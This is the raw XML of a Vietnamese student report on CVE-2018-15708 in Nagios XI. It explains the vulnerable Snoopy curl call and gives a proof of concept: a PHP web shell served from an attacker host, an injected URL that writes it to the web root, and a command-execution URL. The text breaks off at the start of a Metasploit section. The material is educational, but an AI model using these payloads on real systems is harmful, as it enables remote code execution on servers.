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A77374" w14:textId="77777777" w:rsidR="00BD0DD9" w:rsidRDefault="00000000" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6D9C70FC">
          <v:group id="Group 21" o:spid="_x0000_s1043" style="position:absolute;left:0;text-align:left;margin-left:-21.8pt;margin-top:-25.35pt;width:495pt;height:711pt;z-index:-251654144;mso-position-horizontal-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">
            <v:group id="Group 34" o:spid="_x0000_s1044"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45" type="#_x0000_t75" alt="CRNRC057" style="position:absolute;left:1977;top:142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">
                <v:imagedata r:id="rId5" o:title="CRNRC057"/>
              </v:shape>
              <v:shape id="Picture 36" o:spid="_x0000_s1046" type="#_x0000_t75" alt="CRNRC047" style="position:absolute;left:2372;top:187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">
                <v:imagedata r:id="rId6" o:title="CRNRC047"/>
              </v:shape>
            </v:group>
            <v:shape id="Picture 37" o:spid="_x0000_s1047"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">
              <v:imagedata r:id="rId7" o:title="J0105250"/>
            </v:shape>
            <v:group id="Group 38" o:spid="_x0000_s1048" style="position:absolute;left:8891;top:1417;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">
              <v:shape id="Picture 39" o:spid="_x0000_s1049" type="#_x0000_t75" alt="CRNRC057" style="position:absolute;left:1977;top:142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">
                <v:imagedata r:id="rId8" o:title="CRNRC057"/>
              </v:shape>
              <v:shape id="Picture 40" o:spid="_x0000_s1050" type="#_x0000_t75" alt="CRNRC047" style="position:absolute;left:2372;top:187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">
                <v:imagedata r:id="rId6" o:title="CRNRC047"/>
              </v:shape>
            </v:group>
            <v:group id="Group 41" o:spid="_x0000_s1051" style="position:absolute;left:1991;top:13594;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">
              <v:shape id="Picture 42" o:spid="_x0000_s1052" type="#_x0000_t75" alt="CRNRC057" style="position:absolute;left:1977;top:142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">
                <v:imagedata r:id="rId8" o:title="CRNRC057"/>
              </v:shape>
              <v:shape id="Picture 43" o:spid="_x0000_s1053" type="#_x0000_t75" alt="CRNRC047" style="position:absolute;left:2372;top:187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">
                <v:imagedata r:id="rId6" o:title="CRNRC047"/>
              </v:shape>
            </v:group>
            <v:group id="Group 44" o:spid="_x0000_s1054"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">
              <v:shape id="Picture 45" o:spid="_x0000_s1055" type="#_x0000_t75" alt="CRNRC057" style="position:absolute;left:1977;top:142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">
                <v:imagedata r:id="rId5" o:title="CRNRC057"/>
              </v:shape>
              <v:shape id="Picture 46" o:spid="_x0000_s1056" type="#_x0000_t75" alt="CRNRC047" style="position:absolute;left:2372;top:187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">
                <v:imagedata r:id="rId6" o:title="CRNRC047"/>
              </v:shape>
            </v:group>
            <v:shape id="Picture 47" o:spid="_x0000_s1057"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">
              <v:imagedata r:id="rId9" o:title="BDRSC012"/>
            </v:shape>
            <v:shape id="Picture 48" o:spid="_x0000_s1058"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" filled="t" fillcolor="#3cc">
              <v:imagedata r:id="rId9" o:title="BDRSC012"/>
            </v:shape>
            <v:shape id="Picture 49" o:spid="_x0000_s1059"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">
              <v:imagedata r:id="rId7" o:title="J0105250"/>
            </v:shape>
            <w10:wrap anchorx="margin"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404DF04" w14:textId="77777777" w:rsidR="00BD0DD9" w:rsidRDefault="00BD0DD9" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EC66EE" w14:textId="77777777" w:rsidR="00BD0DD9" w:rsidRDefault="00BD0DD9" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cơ sở tại TP.HCM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35A76E" w14:textId="77777777" w:rsidR="00BD0DD9" w:rsidRDefault="00BD0DD9" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C36015">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23CFFB0B" wp14:editId="7CDE9EF2">
            <wp:extent cx="2891864" cy="17373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93675" cy="1738448"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E65012C" w14:textId="5C9242D8" w:rsidR="00BD0DD9" w:rsidRPr="000B49D6" w:rsidRDefault="00BD0DD9" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B49D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MÔN HỌC: </w:t>
      </w:r>
      <w:r w:rsidR="000B49D6" w:rsidRPr="000B49D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CHUYÊN ĐỀ AN NIN</w:t>
      </w:r>
      <w:r w:rsidR="000B49D6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H MẠNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EAE980" w14:textId="5D35846F" w:rsidR="00BD0DD9" w:rsidRPr="000D5016" w:rsidRDefault="00BD0DD9" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5016">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ĐỀ TÀI: </w:t>
      </w:r>
      <w:r w:rsidR="000D5016" w:rsidRPr="000D5016">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VIẾT CHƯƠNG TR</w:t>
      </w:r>
      <w:r w:rsidR="000D5016">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ÌNH PHÁT HIỆN TẤN CÔNG LỖ HỔNG </w:t>
      </w:r>
      <w:r w:rsidR="000D5016" w:rsidRPr="000D5016">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE-2018-15708</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C985B" w14:textId="77777777" w:rsidR="00BD0DD9" w:rsidRPr="000D5016" w:rsidRDefault="00BD0DD9" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3DD87E" w14:textId="77777777" w:rsidR="00BD0DD9" w:rsidRPr="000D5016" w:rsidRDefault="00BD0DD9" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA70FCC" w14:textId="15106393" w:rsidR="00BD0DD9" w:rsidRDefault="00BD0DD9" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Giảng viên: </w:t>
      </w:r>
      <w:r w:rsidR="0089765B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nguyễn Hồng Sơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315DD87" w14:textId="683E83FD" w:rsidR="00BD0DD9" w:rsidRDefault="00BD0DD9" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415A7BB8" w14:textId="47491085" w:rsidR="006737B6" w:rsidRDefault="006737B6" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="590B8D84" w14:textId="77777777" w:rsidR="006737B6" w:rsidRDefault="006737B6" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E04468" w14:textId="77777777" w:rsidR="00BD0DD9" w:rsidRDefault="00BD0DD9" w:rsidP="00BD0DD9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sinh viên thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAD24BE" w14:textId="67430196" w:rsidR="00BD0DD9" w:rsidRDefault="00BD0DD9" w:rsidP="00480C91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lê Khánh Duy –</w:t>
      </w:r>
      <w:r w:rsidR="00480C91">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N18DCAT014</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147E902C" w14:textId="27AA0E91" w:rsidR="00E928CB" w:rsidRDefault="00E928CB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FDA01A" w14:textId="341F2554" w:rsidR="00EE2A1C" w:rsidRDefault="00B46931" w:rsidP="00B46931">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="00B46931">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE-2018-15708</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E7CEED" w14:textId="1DC26DE8" w:rsidR="007D0AAF" w:rsidRPr="007D0AAF" w:rsidRDefault="00825A5C" w:rsidP="007D0AAF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Giới thiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB0DD1B" w14:textId="19260618" w:rsidR="00CC5E82" w:rsidRDefault="005C13E1" w:rsidP="00CC5E82">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C13E1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Một lỗ hổng nghiêm trọng tồn tại trong thư viện </w:t>
      </w:r>
      <w:r w:rsidRPr="00787476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MagpierRSS</w:t>
      </w:r>
      <w:r w:rsidRPr="005C13E1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Thư viện này chứa một phiên bản tùy chỉnh của thành phần </w:t>
      </w:r>
      <w:r w:rsidRPr="005468DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Snoopy</w:t>
      </w:r>
      <w:r w:rsidRPr="005C13E1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho phép kẻ tấn công từ xa, không được xác thực đưa các đối số tùy ý vào lệnh "curl". Bằng cách yêu cầu magpie_debug.php với một giá trị thủ công được chỉ định trong tham số HTTP GET 'url', thành phần dễ bị tấn công có thể bị khai thác để ghi dữ liệu tùy ý vào một vị trí trên đĩa mà người dùng 'apache' có thể ghi được. Chẳng hạn, vị trí </w:t>
      </w:r>
      <w:r w:rsidRPr="00D311CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/usr/local/nagvis/share/</w:t>
      </w:r>
      <w:r w:rsidRPr="005C13E1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể ghi và truy cập công khai. Nếu kẻ tấn công viết mã PHP vào vị trí này, thì việc thực thi mã tùy ý có thể đạt được với các đặc quyền của người dùng apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C48548" w14:textId="7BA179BA" w:rsidR="0091014B" w:rsidRDefault="0091014B" w:rsidP="00CC5E82">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091014B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết hợp với lỗ hổng leo thang đặc quyền cục bộ, việc thực thi mã tùy ý với quyền root là khả thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BF99F6" w14:textId="03E58FD0" w:rsidR="009653C6" w:rsidRDefault="00CB5353" w:rsidP="00CC5E82">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB5353">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Magpie_debug.php chấp nhận tham số HTTP GET, 'url' và sau đó gọi hàm fetch_rss() với URL làm đối số. Hàm fetch_rss được xác định trong </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB3C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/usr/local/nagiosxi/html/includes/dashlets/rss_dashlet/magpierss/rss_fetch.inc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5353">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và được sử dụng để thực hiện yêu cầu HTTP đối với URL được cung cấp. Đào sâu hơn, hàm _fetch_remote_file() được gọi, sau đó hàm này sẽ khởi tạo một đối tượng Snoopy. Sau đó, phương thức tìm nạp () của lớp Snoopy được gọi, phương thức này cuối cùng sẽ gọi phương thức _httpsrequest () nếu URL HTTPS được chỉ định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0581559E" w14:textId="4FF9B5F9" w:rsidR="009653C6" w:rsidRDefault="009653C6" w:rsidP="00CC5E82">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009653C6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cụ thể, mã có vấn đề liên quan đến dòng này trong Snoopy.class.inc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C6FCC1" w14:textId="1A21B6C5" w:rsidR="00297DBA" w:rsidRDefault="000D3212" w:rsidP="000D3212">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003535CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec($this-&gt;curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D6090" w14:textId="5231B5CC" w:rsidR="00F456C2" w:rsidRDefault="000A7C27" w:rsidP="00F456C2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A7C27">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kẻ tấn công từ xa có thể dễ dàng khai thác lỗ hổng này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581837BD" w14:textId="38A3497F" w:rsidR="007D0AAF" w:rsidRDefault="00E4680A" w:rsidP="00E4680A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4680A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bằng chứng về khái niệm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4753A4" w14:textId="6CE53BA1" w:rsidR="0076494A" w:rsidRDefault="000E55CA" w:rsidP="0076494A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E55CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Giả sử kẻ tấn công thiết lập máy chủ web tại </w:t>
      </w:r>
      <w:r w:rsidRPr="00E61B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://192.168.1.191:8080/</w:t>
      </w:r>
      <w:r w:rsidRPr="000E55CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Kẻ tấn công cấu hình máy chủ để phản hồi bằng mã PHP. Một cái gì đó như thế này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312D7A43" w14:textId="0E0E7819" w:rsidR="00137B2D" w:rsidRDefault="00137B2D" w:rsidP="0076494A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00137B2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?php system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9EF6F1" w14:textId="77777777" w:rsidR="0096176B" w:rsidRDefault="003240C3" w:rsidP="00D12B6C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003240C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Phiên bản Nagios XI được đặt tại </w:t>
      </w:r>
      <w:r w:rsidRPr="00E61B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://192.168.1.208</w:t>
      </w:r>
      <w:r w:rsidRPr="003240C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Sử dụng URL sau, kẻ tấn công có thể khai thác lỗ hổng trong lớp Snoopy và ghi mã PHP vào /usr/local/nagvis/share/exec.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C220AEE" w14:textId="1BCC6C80" w:rsidR="00192CF9" w:rsidRDefault="003240C3" w:rsidP="00D12B6C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003240C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lưu ý rằng “-o /usr/local/nagvis/share/exec.php” được bao gồm trong giá trị của tham số 'url'. Điều này yêu cầu curl xuất phản hồi cho tệp này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9B81F4" w14:textId="1286FADF" w:rsidR="00314FB9" w:rsidRDefault="00E35A59" w:rsidP="00D12B6C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00A11444">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://192.168.1.208/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=https://192.168.1.191:8080/%20-o%20/usr/local/nagvis/share/exec.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32AAEF14" w14:textId="602C863A" w:rsidR="00E35A59" w:rsidRDefault="00987668" w:rsidP="00A20610">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987668">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sau khi hoàn thành yêu cầu này, kẻ tấn công có thể thực thi các lệnh hệ thống tùy ý bằng cách tạo một URL như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27263F48" w14:textId="6E3C5E56" w:rsidR="006B73D0" w:rsidRDefault="00030797" w:rsidP="00A20610">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00A11444">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://192.168.1.208/nagvis/exec.php?cmd=whoami</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="396C49E7" w14:textId="523F0B38" w:rsidR="00030797" w:rsidRDefault="001C6D62" w:rsidP="001C6D62">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thực hiện tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEE9EB1" w14:textId="77777777" w:rsidR="00EE0D43" w:rsidRPr="00EE0D43" w:rsidRDefault="00EE0D43" w:rsidP="00EE0D43">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0D43">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiến hành tấn công với payload có sẵn của </w:t>
      </w:r>
      <w:r w:rsidRPr="00A97C74">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0D43">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> với:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664A9E93" w14:textId="3C5078D3" w:rsidR="00EE0D43" w:rsidRPr="00074528" w:rsidRDefault="00EE0D43" w:rsidP="00074528">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00074528">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RHOSTS: là địa chỉ ip của máy Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579E46EC" w14:textId="4615C8F5" w:rsidR="00FA53B6" w:rsidRDefault="00EE0D43" w:rsidP="00074528">
      <w:pPr>
